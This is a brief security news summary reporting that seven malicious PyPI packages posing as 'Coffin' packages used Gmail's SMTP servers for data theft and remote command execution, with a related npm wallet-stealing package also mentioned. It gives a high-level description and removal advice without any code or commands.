Seven malicious PyPi packages were identified, which exploited Gmail’s SMTP servers for data theft and command execution. Discovered by Socket’s threat research team, these packages had been available for over four years, with one surpassing 18,000 downloads. Users are urged to remove these packages and secure their credentials promptly.
Keypoints :
- Seven malicious packages found on PyPi, utilizing Gmail for data exfiltration.
- Packages masqueraded as legitimate ‘Coffin’ offerings, with significant download counts.
- Gmail’s trusted status allowed malicious activities to evade detection by security measures.
- Packages employed hardcoded credentials for remote access and covert operations.
- Malware established encrypted tunnels for extensive control over infected systems.
- Indicators suggest intent for cryptocurrency theft based on email addresses used.
- Users of these packages are advised to remove them immediately and rotate credentials.
- A related npm package was also reported for stealing cryptocurrency wallet information.